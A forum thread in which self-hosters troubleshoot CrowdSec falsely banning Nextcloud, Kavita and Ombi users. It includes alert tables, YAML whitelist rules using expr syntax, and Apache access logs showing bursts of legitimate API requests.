False positives occuring with Nextcloud and eBook reader Kavita

I have CrowdSec running in front of a Nextcloud instance, and if one of my users attempts to sync files using the Nextcloud desktop client, they will usually get themselves banned. Similar things happen when a user is turning pages in a book on Kavita.

I’m pretty new to CrowdSec, so I’m not sure what information would be helpful here, but here’s the relevant alerts for Nextcloud:

| 455 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:12:16.780727354  |
| 454 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:12:02.230303367  |
| 453 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:05:46.160224937  |
| 452 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:04:16.460203323  |
| 451 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:00:55.198849852  |
| 450 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:58:45.905619787  |
| 449 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:53:49.400745564  |
| 448 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:53:14.750015725  |
| 447 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:51:22.467476162  |
| 446 | Ip:X.X.X.X           | crowdsecurity/http-probing           | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:38:03.256405305  |
| 445 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:38:58.110206824  |
| 444 | Ip:X.X.X.X           | crowdsecurity/http-probing           | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:21:51.721533815  |
| 443 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:21:08.864634398  |

Please let me know if I can provide any other information that would help.

Hi there,

Got more or less the same issue.
Installed crowdsec on my Nextcloud server and got banned at my first login attempt.

# cscli decisions list
+-------+----------+-----------------+--------------------------------------+--------+---------+---------+--------+--------------------+----------+
|  ID   |  SOURCE  |   SCOPE:VALUE   |                REASON                | ACTION | COUNTRY |   AS    | EVENTS |     EXPIRATION     | ALERT ID |
+-------+----------+-----------------+--------------------------------------+--------+---------+---------+--------+--------------------+----------+
| 43984 | crowdsec | Ip:x.x.x.x| crowdsecurity/http-crawl-non_statics | ban    | FR      |  Orange |     47 | 1h57m54.664254699s |       62 |
+-------+----------+-----------------+--------------------------------------+--------+---------+---------+--------+--------------------+----------+

Then took a look at the http-crawl-non_statics scenario :

https://hub.crowdsec.net/author/crowdsecurity/configurations/http-crawl-non_statics

Thus, it is just about high rate requests on non static ressources.
Unfortunately, the Nextcloud browser-side code is known to generate a lot of requests (which tends to offer poor user experience).

However, quicly parsed my Apache logs :

cat drive.access.log | cut -d' ' -f8 | cut -d'/' -f-4 | sort | uniq -c
...
    1 /index.php/js/core
      3 /index.php/login
      1 /index.php/svg/activity
      1 /index.php/svg/circles
     43 /index.php/svg/contacts
    187 /index.php/svg/core
      2 /index.php/svg/deck
      8 /index.php/svg/files
...

Hummm, looks that multiple requests to /index.php/svg is the root cause.

Then, took a look at :

https://discourse.crowdsec.net/t/help-with-whitelist-rules-expression-with-portion-of-url/41

but due to some syntax errors with usage of ‘expression’ in the yaml config file, had to adjust based on :

https://github.com/antonmedv/expr/blob/master/docs/Language-Definition.md

So, finally, I ended with creating the following whitelist file :

vi /etc/crowdsec/parsers/s02-enrich/mynextcloudwhitelist.yaml
name: crowdsecurity/mynextcloudwhitelist
description: "Whitelist events from nextcloud legitimate access"
whitelist:
  reason: "ignore index.php/svg"
  expression:
    - evt.Parsed.request contains "'/index.php/svg/'"

Then :

systemctl restart crowdsec

Removed the false-positive decision :

cscli decisions delete --id 43984

Job done (it looks).

Please, consider this as a candidate workaround ; not a perfect fix.

Regards.

1 Like

Hello,

Thanks for looking into it !
If either of you would be able to provide more logs of what is going on, we might be able to come up with an improved whitelist (hopefully).

On the side @caramb, can you tell me more on the issue you faced with :

1 Like

Hello Thibault,

Regarding the syntax error issue, the post suggests to use the following :

name: my-custom-whitelist
description: my custom whitelists
whitelist:
  reason: do not ban jellyfin users
  expression:
     - "'/jellyfin' in evt.Parsed.request"

So tried :

name: crowdsecurity/mynextcloudwhitelist
description: "Whitelist events from nextcloud legitimate access"
whitelist:
  reason: "ignore index.php/svg"
  expression:
    - "'/index.php/svg/' in evt.Parsed.request"

But this causes a syntax error :

-- L'unité (unit) crowdsec.service a commencé à démarrer.
nov. 08 13:08:30 nextcloud crowdsec[17901]: time="08-11-2021 13:08:30" level=fatal msg="Unable to compile whitelist expression ''/index.php/svg/' in evt.Parsed.request' : invalid operation: in (mismatched types string and string) (1:19)\
nov. 08 13:08:30 nextcloud systemd[1]: crowdsec.service: Control process exited, code=exited, status=1/FAILURE

This is the reason why I replaced

"'/index.php/svg/' in evt.Parsed.request"

with

evt.Parsed.request contains "'/index.php/svg/'"

Regards.

What logs are you looking for? I’m not sure where to find them in the Docker container.

It would be the logs of the webservice itself, you might be able to get them directly from docker logs -n XXXX of the container running the nextcloud service.

I’m having the same issue, but for file-syncing activity. I have modified the whitelist rule posted here. I am a little concerned about ignoring solely based on the path.
Does anyone know if traefik logs specify that a request sent to Nextcloud is authenticated? If so, what would I add to the whitelist rule to make sure only authenticated users are ignored, or would it be better to ignore successful accesses?

EDIT:
Would something like - evt.Parsed.status matches "2.*" added under expression work?

@thibault
I’m also having issues with false positives.
Is there a documentation or guide how to deal with them?
Is it recommended to add the domain paths causing issues to whitelist-file as mentioned here?
How do I submit logs for improving whitelists? Post them here?
Apps I had issues with: Jellyfin and Ombi

so here are apache logs of me accessing page /ombi/discover/actor/15140 .
As soon as I have accessed any actors page I will get banned.

xx.xxx.xx.xxx - - [07/Aug/2022:23:02:15 +0200] "GET /ombi/hubs/notification?id=06iztfAE8sxxxxxxCxSKsA&access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWxxxxxxxxxxQWRtaW4iLCJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1laWxxxxxxxxxxciI6IjQwNjIzMmQ0LWRmZDEtNGZjNS1hNjJmLWQ3MTM0OGMwZjEyMSIsImh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDUvaWRlbnRpdHkvY2xhaW1zL25hbWUiOiJyaWNoQWRtaW4iLCJqdGkiOiI4NWMwYxxxxxxxxxx0LTRhNzYtYjJiNy00MzU5YjFkN2FmMWUiLCJJZCI6IjQwNjIxxxxxxxxxxDEtNGZjNS1hNjJmLWQ3MTM0OGMwZjEyMSIsInJvbGUiOiJBZG1pbiIsImV4cCI6MTY5MTQ0MDc4MCwiaXNzIjoiT21iaSIsImF1ZCI6Ik9tYmkifQ.2b_Kths49NXsrkmKkdA0JCFzm37YKtyqG_RrHd7ka8w HTTP/1.1" 200 1038 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/discover/actor/15140 HTTP/1.1" 200 4814 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/styles.fb4607be8fcaa2ac.css HTTP/1.1" 200 11048 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v2/Features/ HTTP/1.1" 200 889 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Settings/customization HTTP/1.1" 200 1109 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Identity/accesstoken HTTP/1.1" 200 315 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/translations/en.json?v=398156668 HTTP/1.1" 200 20289 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Identity/ HTTP/1.1" 200 1516 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Settings/issuesenabled HTTP/1.1" 200 285 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "POST /ombi/hubs/notification/negotiate HTTP/1.1" 200 643 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Settings/voteenabled HTTP/1.1" 200 849 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Request/movie/remaining HTTP/1.1" 200 373 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Request/music/remaining HTTP/1.1" 200 937 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Request/tv/remaining HTTP/1.1" 200 373 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v2/search/actor/15140/movie HTTP/1.1" 200 63865 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v2/search/actor/15140/tv HTTP/1.1" 200 8748 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/1721 HTTP/1.1" 200 37036 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/10295 HTTP/1.1" 200 38468 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/4391 HTTP/1.1" 200 19304 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/10915 HTTP/1.1" 200 42532 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11175 HTTP/1.1" 200 41049 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11496 HTTP/1.1" 200 38297 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/6399 HTTP/1.1" 200 39833 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11539 HTTP/1.1" 200 36832 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11616 HTTP/1.1" 200 39416 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/6916 HTTP/1.1" 200 41794 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11681 HTTP/1.1" 200 38675 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11689 HTTP/1.1" 200 42020 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/8833 HTTP/1.1" 200 36692 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11829 HTTP/1.1" 200 36787 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9287 HTTP/1.1" 200 40504 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9031 HTTP/1.1" 200 36940 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9394 HTTP/1.1" 200 36838 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/12529 HTTP/1.1" 200 36251 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9474 HTTP/1.1" 200 39978 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/41608 HTTP/1.1" 200 38405 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/46436 HTTP/1.1" 200 26679 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/44699 HTTP/1.1" 200 37458 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/46446 HTTP/1.1" 200 18043 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/46443 HTTP/1.1" 200 35997 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/39807 HTTP/1.1" 200 24578 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11367 HTTP/1.1" 200 37948 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11333 HTTP/1.1" 200 37861 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/52721 HTTP/1.1" 200 37175 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/54149 HTTP/1.1" 200 16558 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/54166 HTTP/1.1" 200 20540 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/54164 HTTP/1.1" 200 37551 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/55093 HTTP/1.1" 200 33558 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/107527 HTTP/1.1" 200 20802 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/269281 HTTP/1.1" 200 19135 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/126813 HTTP/1.1" 200 20019 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/385614 HTTP/1.1" 200 23113 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/328765 HTTP/1.1" 200 16924 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/239211 HTTP/1.1" 200 18673 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/100081 HTTP/1.1" 200 22731 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/271792 HTTP/1.1" 200 19440 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/598050 HTTP/1.1" 200 15569 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11874 HTTP/1.1" 200 36411 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/61937 HTTP/1.1" 200 20827 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/214007 HTTP/1.1" 200 17472 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/46568 HTTP/1.1" 200 23463 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/346566 HTTP/1.1" 200 15324 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/25388 HTTP/1.1" 200 39250 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/351746 HTTP/1.1" 200 25430 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/212795 HTTP/1.1" 200 19519 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/251850 HTTP/1.1" 200 16579 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/439853 HTTP/1.1" 200 15381 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/429710 HTTP/1.1" 200 18751 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/206639 HTTP/1.1" 200 22580 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464271 HTTP/1.1" 200 2250 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464267 HTTP/1.1" 200 16151 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464263 HTTP/1.1" 200 19183 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464265 HTTP/1.1" 200 18784 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/731170 HTTP/1.1" 200 16931 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/564191 HTTP/1.1" 200 14743 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/430082 HTTP/1.1" 200 15439 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
